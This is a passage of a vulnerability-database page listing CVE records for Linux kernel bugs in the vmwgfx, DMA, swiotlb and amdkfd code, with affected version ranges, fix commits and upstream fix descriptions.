"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/vmwgfx/ttm_object.c",
"drivers/gpu/drm/vmwgfx/ttm_object.h",
"drivers/gpu/drm/vmwgfx/vmwgfx_bo.c",
"drivers/gpu/drm/vmwgfx/vmwgfx_drv.h",
"drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c",
"drivers/gpu/drm/vmwgfx/vmwgfx_resource.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7ac9578e45b20e3f3c0c8eb71f5417a499a7226a",
"status": "affected",
"version": "e14c02e6b6990e9f6ee18a214a22ac26bae1b25e",
"versionType": "git"
},
{
"lessThan": "a309c7194e8a2f8bd4539b9449917913f6c2cd50",
"status": "affected",
"version": "e14c02e6b6990e9f6ee18a214a22ac26bae1b25e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/vmwgfx/ttm_object.c",
"drivers/gpu/drm/vmwgfx/ttm_object.h",
"drivers/gpu/drm/vmwgfx/vmwgfx_bo.c",
"drivers/gpu/drm/vmwgfx/vmwgfx_drv.h",
"drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c",
"drivers/gpu/drm/vmwgfx/vmwgfx_resource.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Remove rcu locks from user resources\n\nUser resource lookups used rcu to avoid two extra atomics. Unfortunately\nthe rcu paths were buggy and it was easy to make the driver crash by\nsubmitting command buffers from two different threads. Because the\nlookups never show up in performance profiles replace them with a\nregular spin lock which fixes the races in accesses to those shared\nresources.\n\nFixes kernel oops\u0027es in IGT\u0027s vmwgfx execution_buffer stress test and\nseen crashes with apps using shared resources."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:30.419Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7ac9578e45b20e3f3c0c8eb71f5417a499a7226a"
},
{
"url": "https://git.kernel.org/stable/c/a309c7194e8a2f8bd4539b9449917913f6c2cd50"
}
],
"title": "drm/vmwgfx: Remove rcu locks from user resources",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48887",
"datePublished": "2024-08-21T06:10:19.073Z",
"dateReserved": "2024-08-21T06:06:23.290Z",
"dateUpdated": "2025-05-04T08:25:30.419Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43856 (GCVE-0-2024-43856)
Vulnerability from cvelistv5
Published
2024-08-17 09:24
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dma: fix call order in dmam_free_coherent
dmam_free_coherent() frees a DMA allocation, which makes the
freed vaddr available for reuse, then calls devres_destroy()
to remove and free the data structure used to track the DMA
allocation. Between the two calls, it is possible for a
concurrent task to make an allocation with the same vaddr
and add it to the devres list.
If this happens, there will be two entries in the devres list
with the same vaddr and devres_destroy() can free the wrong
entry, triggering the WARN_ON() in dmam_match.
Fix by destroying the devres entry before freeing the DMA
allocation.
kokonut //net/encryption
http://sponge2/b9145fe6-0f72-4325-ac2f-a84d81075b03
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9ac7849e35f705830f7b016ff272b0ff1f7ff759 Version: 9ac7849e35f705830f7b016ff272b0ff1f7ff759 Version: 9ac7849e35f705830f7b016ff272b0ff1f7ff759 Version: 9ac7849e35f705830f7b016ff272b0ff1f7ff759 Version: 9ac7849e35f705830f7b016ff272b0ff1f7ff759 Version: 9ac7849e35f705830f7b016ff272b0ff1f7ff759 Version: 9ac7849e35f705830f7b016ff272b0ff1f7ff759 Version: 9ac7849e35f705830f7b016ff272b0ff1f7ff759 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43856",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:07:08.178694Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:20.523Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/dma/mapping.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fe2d246080f035e0af5793cb79067ba125e4fb63",
"status": "affected",
"version": "9ac7849e35f705830f7b016ff272b0ff1f7ff759",
"versionType": "git"
},
{
"lessThan": "2f7bbdc744f2e7051d1cb47c8e082162df1923c9",
"status": "affected",
"version": "9ac7849e35f705830f7b016ff272b0ff1f7ff759",
"versionType": "git"
},
{
"lessThan": "257193083e8f43907e99ea633820fc2b3bcd24c7",
"status": "affected",
"version": "9ac7849e35f705830f7b016ff272b0ff1f7ff759",
"versionType": "git"
},
{
"lessThan": "87b34c8c94e29fa01d744e5147697f592998d954",
"status": "affected",
"version": "9ac7849e35f705830f7b016ff272b0ff1f7ff759",
"versionType": "git"
},
{
"lessThan": "f993a4baf6b622232e4c190d34c220179e5d61eb",
"status": "affected",
"version": "9ac7849e35f705830f7b016ff272b0ff1f7ff759",
"versionType": "git"
},
{
"lessThan": "1fe97f68fce1ba24bf823bfb0eb0956003473130",
"status": "affected",
"version": "9ac7849e35f705830f7b016ff272b0ff1f7ff759",
"versionType": "git"
},
{
"lessThan": "22094f5f52e7bc16c5bf9613365049383650b02e",
"status": "affected",
"version": "9ac7849e35f705830f7b016ff272b0ff1f7ff759",
"versionType": "git"
},
{
"lessThan": "28e8b7406d3a1f5329a03aa25a43aa28e087cb20",
"status": "affected",
"version": "9ac7849e35f705830f7b016ff272b0ff1f7ff759",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/dma/mapping.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.21"
},
{
"lessThan": "2.6.21",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "2.6.21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "2.6.21",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndma: fix call order in dmam_free_coherent\n\ndmam_free_coherent() frees a DMA allocation, which makes the\nfreed vaddr available for reuse, then calls devres_destroy()\nto remove and free the data structure used to track the DMA\nallocation. Between the two calls, it is possible for a\nconcurrent task to make an allocation with the same vaddr\nand add it to the devres list.\n\nIf this happens, there will be two entries in the devres list\nwith the same vaddr and devres_destroy() can free the wrong\nentry, triggering the WARN_ON() in dmam_match.\n\nFix by destroying the devres entry before freeing the DMA\nallocation.\n\n kokonut //net/encryption\n http://sponge2/b9145fe6-0f72-4325-ac2f-a84d81075b03"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:48.406Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fe2d246080f035e0af5793cb79067ba125e4fb63"
},
{
"url": "https://git.kernel.org/stable/c/2f7bbdc744f2e7051d1cb47c8e082162df1923c9"
},
{
"url": "https://git.kernel.org/stable/c/257193083e8f43907e99ea633820fc2b3bcd24c7"
},
{
"url": "https://git.kernel.org/stable/c/87b34c8c94e29fa01d744e5147697f592998d954"
},
{
"url": "https://git.kernel.org/stable/c/f993a4baf6b622232e4c190d34c220179e5d61eb"
},
{
"url": "https://git.kernel.org/stable/c/1fe97f68fce1ba24bf823bfb0eb0956003473130"
},
{
"url": "https://git.kernel.org/stable/c/22094f5f52e7bc16c5bf9613365049383650b02e"
},
{
"url": "https://git.kernel.org/stable/c/28e8b7406d3a1f5329a03aa25a43aa28e087cb20"
}
],
"title": "dma: fix call order in dmam_free_coherent",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43856",
"datePublished": "2024-08-17T09:24:26.560Z",
"dateReserved": "2024-08-17T09:11:59.278Z",
"dateUpdated": "2025-05-04T09:27:48.406Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48853 (GCVE-0-2022-48853)
Vulnerability from cvelistv5
Published
2024-07-16 12:25
Modified
2025-05-04 08:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
swiotlb: fix info leak with DMA_FROM_DEVICE
The problem I'm addressing was discovered by the LTP test covering
cve-2018-1000204.
A short description of what happens follows:
1) The test case issues a command code 00 (TEST UNIT READY) via the SG_IO
interface with: dxfer_len == 524288, dxdfer_dir == SG_DXFER_FROM_DEV
and a corresponding dxferp. The peculiar thing about this is that TUR
is not reading from the device.
2) In sg_start_req() the invocation of blk_rq_map_user() effectively
bounces the user-space buffer. As if the device was to transfer into
it. Since commit a45b599ad808 ("scsi: sg: allocate with __GFP_ZERO in
sg_build_indirect()") we make sure this first bounce buffer is
allocated with GFP_ZERO.
3) For the rest of the story we keep ignoring that we have a TUR, so the
device won't touch the buffer we prepare as if the we had a
DMA_FROM_DEVICE type of situation. My setup uses a virtio-scsi device
and the buffer allocated by SG is mapped by the function
virtqueue_add_split() which uses DMA_FROM_DEVICE for the "in" sgs (here
scatter-gather and not scsi generics). This mapping involves bouncing
via the swiotlb (we need swiotlb to do virtio in protected guest like
s390 Secure Execution, or AMD SEV).
4) When the SCSI TUR is done, we first copy back the content of the second
(that is swiotlb) bounce buffer (which most likely contains some
previous IO data), to the first bounce buffer, which contains all
zeros. Then we copy back the content of the first bounce buffer to
the user-space buffer.
5) The test case detects that the buffer, which it zero-initialized,
ain't all zeros and fails.
One can argue that this is an swiotlb problem, because without swiotlb
we leak all zeros, and the swiotlb should be transparent in a sense that
it does not affect the outcome (if all other participants are well
behaved).
Copying the content of the original buffer into the swiotlb buffer is
the only way I can think of to make swiotlb transparent in such
scenarios. So let's do just that if in doubt, but allow the driver
to tell us that the whole mapped buffer is going to be overwritten,
in which case we can preserve the old behavior and avoid the performance
impact of the extra bounce.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:25:01.804Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c132f2ba716b5ee6b35f82226a6e5417d013d753"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/971e5dadffd02beba1063e7dd9c3a82de17cf534"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d9ac1b6665c73f23e963775f85d99679fd8e192"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6bfc5377a210dbda2a237f16d94d1bd4f1335026"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d4d975e7921079f877f828099bb8260af335508f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7403f4118ab94be837ab9d770507537a8057bc63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/270475d6d2410ec66e971bf181afe1958dad565e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ddbd89deb7d32b1fbb879f48d68fda1a8ac58e8e"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48853",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:25:58.844703Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:08.301Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"Documentation/core-api/dma-attributes.rst",
"include/linux/dma-mapping.h",
"kernel/dma/swiotlb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c132f2ba716b5ee6b35f82226a6e5417d013d753",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "971e5dadffd02beba1063e7dd9c3a82de17cf534",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8d9ac1b6665c73f23e963775f85d99679fd8e192",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6bfc5377a210dbda2a237f16d94d1bd4f1335026",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7403f4118ab94be837ab9d770507537a8057bc63",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "270475d6d2410ec66e971bf181afe1958dad565e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ddbd89deb7d32b1fbb879f48d68fda1a8ac58e8e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"Documentation/core-api/dma-attributes.rst",
"include/linux/dma-mapping.h",
"kernel/dma/swiotlb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.281",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.245",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.189",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.320",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.281",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.245",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.189",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nswiotlb: fix info leak with DMA_FROM_DEVICE\n\nThe problem I\u0027m addressing was discovered by the LTP test covering\ncve-2018-1000204.\n\nA short description of what happens follows:\n1) The test case issues a command code 00 (TEST UNIT READY) via the SG_IO\n interface with: dxfer_len == 524288, dxdfer_dir == SG_DXFER_FROM_DEV\n and a corresponding dxferp. The peculiar thing about this is that TUR\n is not reading from the device.\n2) In sg_start_req() the invocation of blk_rq_map_user() effectively\n bounces the user-space buffer. As if the device was to transfer into\n it. Since commit a45b599ad808 (\"scsi: sg: allocate with __GFP_ZERO in\n sg_build_indirect()\") we make sure this first bounce buffer is\n allocated with GFP_ZERO.\n3) For the rest of the story we keep ignoring that we have a TUR, so the\n device won\u0027t touch the buffer we prepare as if the we had a\n DMA_FROM_DEVICE type of situation. My setup uses a virtio-scsi device\n and the buffer allocated by SG is mapped by the function\n virtqueue_add_split() which uses DMA_FROM_DEVICE for the \"in\" sgs (here\n scatter-gather and not scsi generics). This mapping involves bouncing\n via the swiotlb (we need swiotlb to do virtio in protected guest like\n s390 Secure Execution, or AMD SEV).\n4) When the SCSI TUR is done, we first copy back the content of the second\n (that is swiotlb) bounce buffer (which most likely contains some\n previous IO data), to the first bounce buffer, which contains all\n zeros. Then we copy back the content of the first bounce buffer to\n the user-space buffer.\n5) The test case detects that the buffer, which it zero-initialized,\n ain\u0027t all zeros and fails.\n\nOne can argue that this is an swiotlb problem, because without swiotlb\nwe leak all zeros, and the swiotlb should be transparent in a sense that\nit does not affect the outcome (if all other participants are well\nbehaved).\n\nCopying the content of the original buffer into the swiotlb buffer is\nthe only way I can think of to make swiotlb transparent in such\nscenarios. So let\u0027s do just that if in doubt, but allow the driver\nto tell us that the whole mapped buffer is going to be overwritten,\nin which case we can preserve the old behavior and avoid the performance\nimpact of the extra bounce."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:24:45.753Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c132f2ba716b5ee6b35f82226a6e5417d013d753"
},
{
"url": "https://git.kernel.org/stable/c/971e5dadffd02beba1063e7dd9c3a82de17cf534"
},
{
"url": "https://git.kernel.org/stable/c/8d9ac1b6665c73f23e963775f85d99679fd8e192"
},
{
"url": "https://git.kernel.org/stable/c/6bfc5377a210dbda2a237f16d94d1bd4f1335026"
},
{
"url": "https://git.kernel.org/stable/c/7403f4118ab94be837ab9d770507537a8057bc63"
},
{
"url": "https://git.kernel.org/stable/c/270475d6d2410ec66e971bf181afe1958dad565e"
},
{
"url": "https://git.kernel.org/stable/c/ddbd89deb7d32b1fbb879f48d68fda1a8ac58e8e"
}
],
"title": "swiotlb: fix info leak with DMA_FROM_DEVICE",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48853",
"datePublished": "2024-07-16T12:25:19.814Z",
"dateReserved": "2024-07-16T11:38:08.913Z",
"dateUpdated": "2025-05-04T08:24:45.753Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41011 (GCVE-0-2024-41011)
Vulnerability from cvelistv5
Published
2024-07-18 07:04
Modified
2025-05-04 09:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdkfd: don't allow mapping the MMIO HDP page with large pages
We don't get the right offset in that case. The GPU has
an unused 4K area of the register BAR space into which you can
remap registers. We remap the HDP flush registers into this
space to allow userspace (CPU or GPU) to flush the HDP when it
updates VRAM. However, on systems with >4K pages, we end up
exposing PAGE_SIZE of MMIO space.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d8e408a82704c86ba87c3d58cfe69dcdb758aa07 Version: d8e408a82704c86ba87c3d58cfe69dcdb758aa07 Version: d8e408a82704c86ba87c3d58cfe69dcdb758aa07 Version: d8e408a82704c86ba87c3d58cfe69dcdb758aa07 Version: d8e408a82704c86ba87c3d58cfe69dcdb758aa07 Version: d8e408a82704c86ba87c3d58cfe69dcdb758aa07 Version: d8e408a82704c86ba87c3d58cfe69dcdb758aa07 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.164Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89fffbdf535ce659c1a26b51ad62070566e33b28"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b4cff994a27ebf7bd3fb9a798a1cdfa8d01b724"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6186c93560889265bfe0914609c274eff40bbeb5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be4a2a81b6b90d1a47eaeaace4cc8e2cb57b96c7"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41011",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:25:05.897243Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:06.529Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdkfd/kfd_chardev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "009c4d78bcf07c4ac2e3dd9f275b4eaa72b4f884",
"status": "affected",
"version": "d8e408a82704c86ba87c3d58cfe69dcdb758aa07",
"versionType": "git"
},
{
"lessThan": "f7276cdc1912325b64c33fcb1361952c06e55f63",
"status": "affected",
"version": "d8e408a82704c86ba87c3d58cfe69dcdb758aa07",
"versionType": "git"
},
{
"lessThan": "8ad4838040e5515939c071a0f511ce2661a0889d",
"status": "affected",
"version": "d8e408a82704c86ba87c3d58cfe69dcdb758aa07",
"versionType": "git"
},
{
"lessThan": "89fffbdf535ce659c1a26b51ad62070566e33b28",
"status": "affected",
"version": "d8e408a82704c86ba87c3d58cfe69dcdb758aa07",
"versionType": "git"
},
{
"lessThan": "4b4cff994a27ebf7bd3fb9a798a1cdfa8d01b724",
"status": "affected",
"version": "d8e408a82704c86ba87c3d58cfe69dcdb758aa07",
"versionType": "git"
},
{
"lessThan": "6186c93560889265bfe0914609c274eff40bbeb5",
"status": "affected",
"version": "d8e408a82704c86ba87c3d58cfe69dcdb758aa07",
"versionType": "git"
},
{
"lessThan": "be4a2a81b6b90d1a47eaeaace4cc8e2cb57b96c7",
"status": "affected",
"version": "d8e408a82704c86ba87c3d58cfe69dcdb758aa07",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdkfd/kfd_chardev.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.283",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.225",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.166",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.283",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.225",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
